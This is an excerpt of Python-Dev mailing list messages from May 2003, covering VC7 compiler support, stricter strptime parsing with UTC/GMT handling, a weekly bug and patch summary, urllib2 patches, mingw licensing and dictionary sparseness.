In-Reply-To: <3EBC0C5B.7030101@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net> <3EBC0C5B.7030101@lemburg.com>
Message-ID: <3EBC1581.3060303@v.loewis.de>

M.-A. Lemburg wrote:

>> AFAIK, current CVS Python compiles under VC7 now.
> 
> That's nice :-) I meant: adding features from VC7 to Python.

That is done as well. There is quite a bit of conditional code that
selects features available only in VC7, such as the use of
getaddrinfo in the socket module.

Regards,
Martin



From tim.one@comcast.net  Fri May  9 21:58:28 2003
From: tim.one@comcast.net (Tim Peters)
Date: Fri, 09 May 2003 16:58:28 -0400
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBC0C5B.7030101@lemburg.com>
Message-ID: <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>

[MAL]
>>> How about adding support for VC7 features in 2.4

[Tim]
>> AFAIK, current CVS Python compiles under VC7 now.

[MAL]
> That's nice :-) I meant: adding features from VC7 to Python.

Umm, could you name one?  VC7 is a compiler to me.  I don't know what it means
to add a compiler feature to Python, so I transformed the suggestion into one I
understood.

>>> and starting the transition in 2.5 ?

>> I expect that mostly depends on who's doing the work.  PLabs Windows
>> development is on auto-pilot (aka benign neglect).  The first person to
>> volunteer time to do anything here gets to set the policy for
>> the next two decades <0.9 wink>.

> How come ? I always thought that Zope's main deployment platform
> is Windows....

I don't know, but doubt it, and Windows users are conspicuous by their absence on
the public Zope dev mailing lists.  Regardless, Zope strives to be a
platform-neutral application, so I've never been surprised that Zope Corp's
interest in Windows-specific Python work has been undetectable.



From drifty@alum.berkeley.edu  Sat May 10 00:41:25 2003
From: drifty@alum.berkeley.edu (Brett Cannon)
Date: Fri, 9 May 2003 16:41:25 -0700 (PDT)
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
 <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU>

[Guido van Rossum]

> > I got a single email from someone asking me to change the
> > functionality so that it would raise an exception if part of the
> > input string was not parsed.
>
> That sounds like a good idea on the face of it.  Or will this break
> existing code?
>

Maybe.  If they depend on some specific behavior on a platform that offers
it, then yes, there could be issues.  But since the docs are so vague, if
it does break code it will most likely be because someone didn't follow
the warnings in the spec.

And while we are on this subject, does anyone have any issues if I cause
_strptime to recognize UTC and GMT as timezones?  The Solaris box I always
use for libc strptime comparisons does not recognize them as
acceptable values for %Z, but since it is a known fact that neither has
daylight saving time, I feel _strptime should recognize this fact and set the
daylight savings value to 0 instead of raising an error saying it
doesn't know about that timezone.
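
Roughly the kind of check I have in mind, as a stand-alone sketch (the
helper name and structure are made up; the real _strptime code is laid
out differently):

    import time

    def _dst_flag(tz_string):
        # hypothetical helper: map a %Z value to a tm_isdst flag
        zone = tz_string.lower()
        if zone in ("utc", "gmt"):
            return 0                # neither UTC nor GMT ever has DST
        if zone == time.tzname[0].lower():
            return 0
        if time.daylight and zone == time.tzname[1].lower():
            return 1
        return -1                   # unknown; the real code raises an error here

    print _dst_flag("GMT"), _dst_flag("UTC")    # prints: 0 0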

Any objections to the change?

-Brett


From guido@python.org  Sat May 10 01:35:46 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 09 May 2003 20:35:46 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: "Your message of Fri, 09 May 2003 16:41:25 PDT."
 <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
 <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>
 <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU>
Message-ID: <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net>

[Brett]
> > > I got a single email from someone asking me to change the
> > > functionality so that it would raise an exception if part of the
> > > input string was not parsed.
> >
[Guido van Rossum]
> > That sounds like a good idea on the face of it.  Or will this break
> > existing code?

[Brett]
> Maybe.  If they depend on some specific behavior on a platform that offers
> it, then yes, there could be issues.  But since the docs are so vague if
> it does break code it will most likely be because someone didn't follow
> the warnings in the spec.

If you add some flag to control this behavior, defaulting to strict,
then at least people who rely on the old (non-strict) behavior can use
the flag rather than redesign their application.
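
Purely as an illustration -- no such argument exists today -- the kind of
interface I mean could be faked with a wrapper along these lines:

    import time

    def strptime2(s, fmt, strict=True):
        # hypothetical wrapper only -- not part of the time module
        if strict:
            return time.strptime(s, fmt)   # 2.3's strptime already rejects leftovers
        for end in range(len(s), 0, -1):   # crude non-strict fallback:
            try:                           # retry on ever-shorter prefixes
                return time.strptime(s[:end], fmt)
            except ValueError:
                pass
        raise ValueError("no prefix of %r matches %r" % (s, fmt))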

> And while we are on this subject, does anyone have any issues if I cause
> _strptime to recognize UTC and GMT as timezones?  The Solaris box I always
> use to do libc strptime comparisons to does not recognize it as an
> acceptable value for %Z, but since it is a known fact that neither have
> daylight savings I feel _strptime should recognize this fact and set the
> daylight savings value to 0 instead of raising an error saying it
> doesn't know about that timezone.
> 
> Any objections to the change?

Go for it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From drifty@alum.berkeley.edu  Sat May 10 03:13:35 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Fri, 09 May 2003 19:13:35 -0700
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com> <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU> <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net> <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU> <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EBC604F.7040306@ocf.berkeley.edu>

Guido van Rossum wrote:
> [Brett]
> 
>>>>I got a single email from someone asking me to change the
>>>>functionality so that it would raise an exception if part of the
>>>>input string was not parsed.
>>>
> [Guido van Rossum]
> 
>>>That sounds like a good idea on the face of it.  Or will this break
>>>existing code?
> 
> 
> [Brett]
> 
>>Maybe.  If they depend on some specific behavior on a platform that offers
>>it, then yes, there could be issues.  But since the docs are so vague if
>>it does break code it will most likely be because someone didn't follow
>>the warnings in the spec.
> 
> 
> If you add some flag to control this behavior, defaulting to strict,
> then at least people who rely on the old (non-strict) behavior can use
> the flag rather than redesign their application.
> 

But the problem is that I have no idea what the old behavior is.  Since 
the spec is so vague and open, I have no clue what all the various libc 
versions do.  I have just been patching strptime as best I can to 
handle strange edge cases that pop up and to make it work as people like 
Kevin need it to.

Unless you are suggesting a flag that, when set, controls whether the 
Python version or a libc version (if available) is used, which I guess 
could work as a transition to get people to move over.  Is this what you 
are getting at, Guido?  And if it is, do you want it at the function or 
module level?  I say function, but that is because it would be easier to 
code.  =)

>>And while we are on this subject, does anyone have any issues if I cause
>>_strptime to recognize UTC and GMT as timezones?  The Solaris box I always
>>use to do libc strptime comparisons to does not recognize it as an
>>acceptable value for %Z, but since it is a known fact that neither have
>>daylight savings I feel _strptime should recognize this fact and set the
>>daylight savings value to 0 instead of raising an error saying it
>>doesn't know about that timezone.
>>
>>Any objections to the change?
> 
> 
> Go for it.
> 

Great.  Once we have settled on this possible strict flag I will make 
the change to _strptime.

-Brett



From mal@lemburg.com  Sat May 10 08:32:38 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 10 May 2003 09:32:38 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBC1581.3060303@v.loewis.de>
References: <BIEJKCLHCIOIHAGOKOLHEEDBFKAA.tim.one@comcast.net>	<3EBC0C5B.7030101@lemburg.com> <3EBC1581.3060303@v.loewis.de>
Message-ID: <3EBCAB16.3080007@lemburg.com>

Martin v. Löwis wrote:
> M.-A. Lemburg wrote:
>
>>> AFAIK, current CVS Python compiles under VC7 now.
>>
>>
>> That's nice :-) I meant: adding features from VC7 to Python.
>
> That is done as well. There is quite some conditional code that
> selects features available only in VC7, such as usage of
> getaddrinfo in the socket module.

Cool, so the time machine has worked again :-)

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 10 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        45 days left



From mal@lemburg.com  Sat May 10 08:35:44 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Sat, 10 May 2003 09:35:44 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
References: <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
Message-ID: <3EBCABD0.7050700@lemburg.com>

Tim Peters wrote:
> [MAL]
> 
>>>>How about adding support for VC7 features in 2.4
> 
> [Tim]
> 
>>>AFAIK, current CVS Python compiles under VC7 now.
> 
> [MAL]
> 
>>That's nice :-) I meant: adding features from VC7 to Python.
> 
> Umm, could you name one?  VC7 is a compiler to me.  I don't know what it means
> to add a compiler feature to Python, so I transformed the suggestion into one I
> understood.

There must be some or else why would someone want to buy VC7
(apart from trying to be hype-compliant) ?

>>>>and starting the transition in 2.5 ?
> 
>>>I expect that mostly depends on who's doing the work.  PLabs Windows
>>>development is on auto-pilot (aka benign neglect).  The first person to
>>>volunteer time to do anything here gets to set the policy for
>>>the next two decades <0.9 wink>.
> 
>>How come ? I always thought that Zope's main deployment platform
>>is Windows....
> 
> I don't know, but doubt it, and Windows users are conspicuous by absence on
> the public Zope dev mailing lists.  Regardless, Zope strives to be a
> platform-neutral application, so I've never been surprised that Zope Corp's
> interest in Windows-specific Python work has been undetectable.

Interesting. I find that most downloads for our Zope software
tend to be for the win32 platform.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, May 10 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
EuroPython 2003, Charleroi, Belgium:                        45 days left



From martin@v.loewis.de  Sat May 10 08:53:26 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 10 May 2003 09:53:26 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <3EBCABD0.7050700@lemburg.com>
References: <BIEJKCLHCIOIHAGOKOLHKEDLFKAA.tim.one@comcast.net>
 <3EBCABD0.7050700@lemburg.com>
Message-ID: <m3ptmr2q6h.fsf@mira.informatik.hu-berlin.de>

"M.-A. Lemburg" <mal@lemburg.com> writes:

> There must be some or else why would someone want to buy VC7
> (apart from trying to be hype-compliant) ?

There are many reasons to buy VC7. I assume the typical reasons are
- if you never had a Microsoft compiler, and buy one now, it will
  be 7.x (you may not even get VC6 anymore)
- the C++ compiler has much improved
- debugging was improved
- it includes a more recent Windows SDK, exposing functions available
  on W2k+
- it supports C# and .NET development

Of those reasons, few are relevant for Python, except that some people
are now using VC7 exclusively for other reasons, and want a VC7-built
python to better integrate their extensions.

Regards,
Martin


From guido@python.org  Sat May 10 18:42:51 2003
From: guido@python.org (Guido van Rossum)
Date: Sat, 10 May 2003 13:42:51 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: "Your message of Fri, 09 May 2003 19:13:35 PDT."
 <3EBC604F.7040306@ocf.berkeley.edu>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com>
 <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU>
 <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net>
 <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU>
 <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net>
 <3EBC604F.7040306@ocf.berkeley.edu>
Message-ID: <200305101742.h4AHgpv13692@pcp02138704pcs.reston01.va.comcast.net>

> > [Brett]
> > 
> >>>>I got a single email from someone asking me to change the
> >>>>functionality so that it would raise an exception if part of the
> >>>>input string was not parsed.
> >>>
> > [Guido van Rossum]
> > 
> >>>That sounds like a good idea on the face of it.  Or will this break
> >>>existing code?
> > 
> > 
> > [Brett]
> > 
> >>Maybe.  If they depend on some specific behavior on a platform that offers
> >>it, then yes, there could be issues.  But since the docs are so vague if
> >>it does break code it will most likely be because someone didn't follow
> >>the warnings in the spec.
> > 
> > 
> > If you add some flag to control this behavior, defaulting to strict,
> > then at least people who rely on the old (non-strict) behavior can use
> > the flag rather than redesign their application.
> > 
> 
> But the problem is that I have no idea what the old behavior is.  Since 
> the spec is so vague and open I have no clue what all the various libc 
> versions do.  I have just been patching strptime the best I can to 
> handle strange edge cases that pop up and work as people like Kevin need 
> it to.

OK.  Maybe I misunderstood (I've now got to admit that I've never
tried strptime myself).  From your initial message (still quoted
above) I thought that it was a simple case of strptime parsing as much
as it could and then giving up (sort of like sscanf), and that the
suggestion you received was to make it insist on parsing everything or
fail.  I still think that would be a clear improvement.  But if the
original situation wasn't as clear-cut, maybe I should have stayed out
of this...

> Unless you are suggesting a flag that when set controls whether the 
> Python version or a libc version if available is used, which I guess 
> could work as a transition to get people to move over.  Is this what you 
> are getting at, Guido?  And if it is, do you want it at the function or 
> module level?  I say function, but that is because it would be easier to 
> code.  =)

No, that's not what I was going for at all -- I think that would be a
mistake that would just cause people to worry needlessly about which
strptime version they should use.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From drifty@alum.berkeley.edu  Sat May 10 19:29:07 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sat, 10 May 2003 11:29:07 -0700
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <200305101742.h4AHgpv13692@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCCEFMEJAB.tim_one@email.msn.com> <Pine.SOL.4.55.0305090229430.21553@death.OCF.Berkeley.EDU> <200305091438.h49Ec9K08904@pcp02138704pcs.reston01.va.comcast.net> <Pine.SOL.4.55.0305091636560.13192@death.OCF.Berkeley.EDU> <200305100035.h4A0Zk812664@pcp02138704pcs.reston01.va.comcast.net> <3EBC604F.7040306@ocf.berkeley.edu> <200305101742.h4AHgpv13692@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3EBD44F3.9020904@ocf.berkeley.edu>

Guido van Rossum wrote:
>>>[Brett]
>>>
>>>
>>>>>>I got a single email from someone asking me to change the
>>>>>>functionality so that it would raise an exception if part of the
>>>>>>input string was not parsed.
>>>>>
>>>[Guido van Rossum]
>>>
>>>
>>>>>That sounds like a good idea on the face of it.  Or will this break
>>>>>existing code?
>>>
>>>
>>>[Brett]
>>>
>>>
>>>>Maybe.  If they depend on some specific behavior on a platform that offers
>>>>it, then yes, there could be issues.  But since the docs are so vague if
>>>>it does break code it will most likely be because someone didn't follow
>>>>the warnings in the spec.
>>>
>>>
>>>If you add some flag to control this behavior, defaulting to strict,
>>>then at least people who rely on the old (non-strict) behavior can use
>>>the flag rather than redesign their application.
>>>
>>
>>But the problem is that I have no idea what the old behavior is.  Since 
>>the spec is so vague and open I have no clue what all the various libc 
>>versions do.  I have just been patching strptime the best I can to 
>>handle strange edge cases that pop up and work as people like Kevin need 
>>it to.
> 
> 
> OK.  Maybe I misunderstood (I've now got to admit that I've never
> tried strptime myself).  From your initial message (still quoted
> above) I thought that it was a simple case of strptime parsing as much
> as it could and then giving up (sort of like sscanf), and that the
> suggestion you received was to make it insist on parsing everything or
> fail.  I still think that would be a clear improvement.  But if the
> original situation wasn't as clear-cut, maybe I should have stayed out
> of this...
> 

I wasn't clear enough.  I already patched strptime to raise an error if 
there is anything left that was not parsed (my first CVS checkin 
actually); this functionality is already there.  So I think we just 
talked ourselves in a circle.  =)
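
For instance (the exact wording of the error message may differ):

    import time
    print time.strptime("2003-05-10", "%Y-%m-%d")[:3]    # (2003, 5, 10)
    try:
        time.strptime("2003-05-10 junk", "%Y-%m-%d")
    except ValueError, e:
        print "rejected:", e      # leftover, unparsed text now raises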

> 
>>Unless you are suggesting a flag that when set controls whether the 
>>Python version or a libc version if available is used, which I guess 
>>could work as a transition to get people to move over.  Is this what you 
>>are getting at, Guido?  And if it is, do you want it at the function or 
>>module level?  I say function, but that is because it would be easier to 
>>code.  =)
> 
> 
> No, that's not what I was going for at all -- I think that would be a
> mistake that would just cause people to worry needlessly about which
> strptime version they should use.
> 

Well, now that I think we have the whole strict parsing issue cleared up, I 
assume we don't need this anymore.  Are there any other worries?

-Brett




From tim@zope.com  Sun May 11 03:46:18 2003
From: tim@zope.com (Tim Peters)
Date: Sat, 10 May 2003 22:46:18 -0400
Subject: [Python-Dev] Make _strptime only time.strptime implementation?
In-Reply-To: <Pine.LNX.4.44.0305091042030.5143-100000@penguin.theopalgroup.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEFDEFAB.tim@zope.com>

[Kevin Jacobs, on strptime]
> I've just retested with my original code and it does look like Brett has
> indeed fixed it.  Or at least fixed it to the point that mktime doesn't
> croak on Linux, Solaris, Tru64, and IRIX with our app.

Great!  Hats off to Brett.

>> ...  the problem is that how strptime behaves varies in fact across
>> boxes.

> Or more importantly that strptime is now standardized in Python, while
> mktime is not.

Ya, that one's a real problem.  The new-in-2.3 datetime module supplies a
saner way to deal with dates & times, but is new, and is probably lacking
some features some people need.  The problem with mktime() is that Python
also wants nice ways to play with random C libraries on your platform, and
platform mktime() implementations are *really* different (they vary in their
beliefs about when "the epoch" begins, what the first representable year is,
what the last representable year is, and whether leap seconds exist; POSIX
gives clear answers to the first and last, explicitly gives up on the middle
two, and not all Python platforms try to follow POSIX anyway).  So I expect
mktime() will remain a cross-platform mess forever -- else Python wouldn't
play nice with the mess that is your platform <0.9 wink>.

> Given that my previous problems with the Python strptime have been
> addressed, I am now +1 on using it (although I'm still going to
> avoid it and mktime in my code as much as possible).

Unfortunately, datetime doesn't supply a wholly sane way to do strftime yet,
and supplies no way to do strptime at all.  The ISO formats are very easy
(by design) to parse, so those might be best to use in portable code.
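
For instance, something along these lines (just a sketch) should behave
the same way everywhere, and hands you a datetime object to play with:

    import time, datetime
    s = "2003-05-10 22:46:18"
    fields = time.strptime(s, "%Y-%m-%d %H:%M:%S")[:6]
    d = datetime.datetime(*fields)     # year, month, day, hour, min, sec
    print d.isoformat(" ")             # 2003-05-10 22:46:18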



From skip@mojam.com  Sun May 11 13:00:24 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 11 May 2003 07:00:24 -0500
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200305111200.h4BC0Ot21778@manatee.mojam.com>

Bug/Patch Summary
-----------------

415 open / 3632 total bugs (-7)
137 open / 2144 total patches (+2)

New Bugs
--------

bsddb.*open mode should default to 'r' rather than 'c' (2003-05-05)
	http://python.org/sf/732951
Need an easy way to check the version (2003-05-06)
	http://python.org/sf/733231
kwargs handled incorrectly (2003-05-06)
	http://python.org/sf/733667
PackMan recursive/force fails on pseudo packages (2003-05-07)
	http://python.org/sf/733819
Function for creating/extracting CoreFoundation types (2003-05-08)
	http://python.org/sf/734695
telnetlib.read_until: float req'd for timeout (2003-05-08)
	http://python.org/sf/734806
pyxml setup error on Mac OS X (2003-05-08)
	http://python.org/sf/734844
Lambda functions in list comprehensions (2003-05-08)
	http://python.org/sf/734869
Mach-O gcc optimisation flag can boost performance up to 10% (2003-05-09)
	http://python.org/sf/735110
urllib2 parse_http_list wrong return (2003-05-09)
	http://python.org/sf/735248
FILEMODE not honoured (2003-05-09)
	http://python.org/sf/735274
Command line timeit.py sets sys.path badly (2003-05-09)
	http://python.org/sf/735293
urllib / urllib2 should cache 301 redirections (2003-05-09)
	http://python.org/sf/735515
cStringIO.StringIO (2003-05-09)
	http://python.org/sf/735535
libwinsound.tex is missing MessageBeep() description (2003-05-10)
	http://python.org/sf/735674

New Patches
-----------

build of html docs broken (liboptparse.tex) (2003-05-04)
	http://python.org/sf/732174
Docs for test package (2003-05-04)
	http://python.org/sf/732394
Allows os.forkpty to work on more platforms (Solaris!) (2003-05-04)
	http://python.org/sf/732401
Make Tkinter.py's nametowidget work with cloned menu widgets (2003-05-07)
	http://python.org/sf/734176
time.tzset documentation (2003-05-08)
	http://python.org/sf/735051
Python2.3b1 makefile improperly installs IDLE (2003-05-10)
	http://python.org/sf/735613
Python makefile may install idle in the wrong place (2003-05-10)
	http://python.org/sf/735614
Pydoc.py fixes links (2003-05-10)
	http://python.org/sf/735694

Closed Bugs
-----------

textwrap has problems wrapping hyphens (2002-08-17)
	http://python.org/sf/596434
httplib HEAD request fails - keepalive (2002-10-11)
	http://python.org/sf/622042
new.function ignores keyword arguments (2003-02-25)
	http://python.org/sf/692959
Mention gmtime in Chapter 6.9 "Time access and conversions" (2003-03-05)
	http://python.org/sf/697983
Clarify timegm documentation (2003-03-05)
	http://python.org/sf/697986
Clarify daylight variable meaning (2003-03-05)
	http://python.org/sf/697988
Clarify mktime semantics (2003-03-05)
	http://python.org/sf/697989
Problems building python with tkinter on HPUX... (2003-03-17)
	http://python.org/sf/704919
OpenBSD 3.2: make altinstall dumps core (2003-03-29)
	http://python.org/sf/712056
cPickle fails to pickle inf (2003-04-03)
	http://python.org/sf/714733
urlopen(url_to_a_non-existing-domain) raises gaierror (2003-04-18)
	http://python.org/sf/723831
textwrap.wrap infinite loop (2003-04-23)
	http://python.org/sf/726446
use bsddb185 if necessary in dbhash (2003-04-24)
	http://python.org/sf/727137
email parsedate still wrong (PATCH) (2003-04-25)
	http://python.org/sf/727719
Tools/msgfmt.py results in two warnings under Python 2.3b1 (2003-04-26)
	http://python.org/sf/728277
setup.py breaks during build of Python-2.3b1 (2003-04-27)
	http://python.org/sf/728322
Long file names in osa suites (2003-04-27)
	http://python.org/sf/728574
ConfigurePython gives depreaction warning (2003-04-27)
	http://python.org/sf/728608
Unexpected Changes in list Iterator (2003-04-30)
	http://python.org/sf/730296
HTTPRedirectHandler variable out of scope (2003-05-01)
	http://python.org/sf/730963
urllib2 raises AttributeError on redirect (2003-05-01)
	http://python.org/sf/731116
IDE "lookup in documentation" doesn't work in interactive wi (2003-05-02)
	http://python.org/sf/731643
GIL not released around getaddrinfo() (2003-05-02)
	http://python.org/sf/731644

Closed Patches
--------------

textwrap.dedent, inspect.getdoc-ish (2002-08-21)
	http://python.org/sf/598163
release GIL around getaddrinfo() (2002-09-03)
	http://python.org/sf/604210
Allow more Unicode on sys.stdout (2002-09-21)
	http://python.org/sf/612627
MSVC 7.0 compiler support (2002-09-25)
	http://python.org/sf/614770
Port tests to unittest (2003-01-05)
	http://python.org/sf/662807
Optimize dictionary resizing (2003-01-20)
	http://python.org/sf/671454
Dictionary tuning (2003-04-29)
	http://python.org/sf/729395
assert from longobject.c, line 1215 (2003-04-30)
	http://python.org/sf/730594


From tim@multitalents.net  Sun May 11 19:49:13 2003
From: tim@multitalents.net (Tim Rice)
Date: Sun, 11 May 2003 11:49:13 -0700 (PDT)
Subject: [Python-Dev] patch 718286
Message-ID: <Pine.UW2.4.53.0305111146450.11325@ou8.int.multitalents.net>

It would be nice to see patch 718286 (DESTDIR variable patch) applied.
It would make package builders' lives easier.

-- 
Tim Rice				Multitalents	(707) 887-1469
tim@multitalents.net



From martin@v.loewis.de  Sun May 11 21:53:33 2003
From: martin@v.loewis.de (Martin v. =?iso-8859-15?q?L=F6wis?=)
Date: 11 May 2003 22:53:33 +0200
Subject: [Python-Dev] patch 718286
In-Reply-To: <Pine.UW2.4.53.0305111146450.11325@ou8.int.multitalents.net>
References: <Pine.UW2.4.53.0305111146450.11325@ou8.int.multitalents.net>
Message-ID: <m3fznlw6gi.fsf@mira.informatik.hu-berlin.de>

Tim Rice <tim@multitalents.net> writes:

> It would be nice to see patch 718286 (DESTDIR variable patch) applied.
> It would make package builders' lives easier.

Done.

Martin


From drifty@alum.berkeley.edu  Mon May 12 00:33:52 2003
From: drifty@alum.berkeley.edu (Brett C.)
Date: Sun, 11 May 2003 16:33:52 -0700
Subject: [Python-Dev] Need some patches checked
Message-ID: <3EBEDDE0.3040308@ocf.berkeley.edu>

Since I am trying to tackle patches that were not written by me for the 
first time I need someone to check that I am doing the right thing.

http://www.python.org/sf/649742 is a patch to make adding headers to 
urllib2's Request object have consistent case.  I cleaned up the patch 
and everything seems reasonable and I don't see how doing this will hurt 
backwards-compatibility, short of code that tried to add multiple headers 
of the same name with different case, which is not legal anyway for HTTP.

http://www.python.org/sf/639139 is a patch wanting to remove an 
isinstance assertion.  Raymond initially suggested weakening the 
assertion to doing attribute checks.  I personally see no reason we 
can't just take the check out entirely since the code does not appear to 
have any place where it will mask an AttributeError exception and the 
comment for the assert says it is just for checking the interface.  But 
since Raymond initially wanted to go another direction I need someone to 
step in and give me some advice (or Raymond can look at it again; patch 
is old).

-Brett



From guido@python.org  Mon May 12 01:20:18 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 11 May 2003 20:20:18 -0400
Subject: [Python-Dev] Need some patches checked
In-Reply-To: "Your message of Sun, 11 May 2003 16:33:52 PDT."
 <3EBEDDE0.3040308@ocf.berkeley.edu>
References: <3EBEDDE0.3040308@ocf.berkeley.edu>
Message-ID: <200305120020.h4C0KIm29011@pcp02138704pcs.reston01.va.comcast.net>

> Since I am trying to tackle patches that were not written by me for the 
> first time I need someone to check that I am doing the right thing.
> 
> http://www.python.org/sf/649742 is a patch to make adding headers to 
> urllib2's Request object have consistent case.  I cleaned up the patch 
> and everything seems reasonable and I don't see how doing this will hurt 
> backwards-compatibility, short of code that tried to add multiple headers 
> of the same name with different case, which is not legal anyway for HTTP.

Good!  I just noticed with disgust that the headers dict is currently
case-sensitive, so that if I want to change the
Content-type header, I have to use the exact case used in the source.
I can't imagine b/w compatibility issues with this.

> http://www.python.org/sf/639139 is a patch wanting to remove an 
> isinstance assertion.  Raymond initially suggested weakening the 
> assertion to doing attribute checks.  I personally see no reason we 
> can't just take the check out entirely since the code does not appear to 
> have any place where it will mask an AttributeError exception and the 
> comment for the assert says it is just for checking the interface.  But 
> since Raymond initially wanted to go another direction I need someone to 
> step in and give me some advice (or Raymond can look at it again; patch 
> is old).

The advantage of the assert (or some other check) is to catch a type
error early, rather than 4 call levels deeper, where the source of the
AttributeError may not be obvious when it happens.  But I agree that
that is a minor issue, and for correct code removing the assert is
fine.  Checking exactly for the attributes that are (or may be) used
is probably overly expensive.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg@cosc.canterbury.ac.nz  Mon May 12 01:38:01 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 12 May 2003 12:38:01 +1200 (NZST)
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <16E1010E4581B049ABC51D4975CEDB880113DAD1@UKDCX001.uk.int.atosorigin.com>
Message-ID: <200305120038.h4C0c1F23070@oma.cosc.canterbury.ac.nz>

> Specifically, mingw exploits a specific clause in the GPL which allows
> dependencies on "components of the OS". MSVCRT qualifies here, but
> MSVCR7 doesn't.

But surely any GPL issues with using mingw apply only
to libraries that mingw *itself* depends on, and then
only if one is redistributing a work derived from
mingw -- not to anything *created* with mingw?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From gh@ghaering.de  Mon May 12 02:26:38 2003
From: gh@ghaering.de (=?ISO-8859-1?Q?Gerhard_H=E4ring?=)
Date: Mon, 12 May 2003 03:26:38 +0200
Subject: [Python-Dev] MS VC 7 offer
In-Reply-To: <200305120038.h4C0c1F23070@oma.cosc.canterbury.ac.nz>
References: <200305120038.h4C0c1F23070@oma.cosc.canterbury.ac.nz>
Message-ID: <3EBEF84E.4090704@ghaering.de>

Greg Ewing wrote:
>>Specifically, mingw exploits a specific clause in the GPL which allows
>>dependencies on "components of the OS". MSVCRT qualifies here, but
>>MSVCR7 doesn't.
> 
> But surely any GPL issues with using mingw apply only
> to libraries that mingw *itself* depends on, and then
> only if one is redistributing a work derived from
> mingw -- not to anything *created* with mingw?

That's my interpretation of the GPL, as well.

-- Gerhard


From tim.one@comcast.net  Mon May 12 02:47:33 2003
From: tim.one@comcast.net (Tim Peters)
Date: Sun, 11 May 2003 21:47:33 -0400
Subject: [Python-Dev] Dictionary sparseness
In-Reply-To: <20030505201416.GB17384@barsoom.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEGBEFAB.tim.one@comcast.net>

[Agthorr]
> An alternate optimization would be the addition of an immutable
> dictionary type to the language, initialized from a mutable dictionary
> type.  Upon creation, this dictionary would optimize itself, in a
> manner similar to the "gperf" program which creates (nearly) minimal
> zero-collision hash tables.

Possibly, but it's fraught with difficulties.  For example, Python dicts can
be indexed by lots of things besides 8-bit strings, and you generally need
to know a great deal about the internal structure of a key type to generate
a sensible hash function.  A more fundamental problem is that minimality can
be harmful when failing lookups are frequent:  a sparse table has a good
chance of hitting a null entry immediately then, but a minimal table never
does.  In the former case full-blown key comparison can be skipped when a
null entry is hit, in the latter case full-blown key comparison is always
needed on a failing lookup.
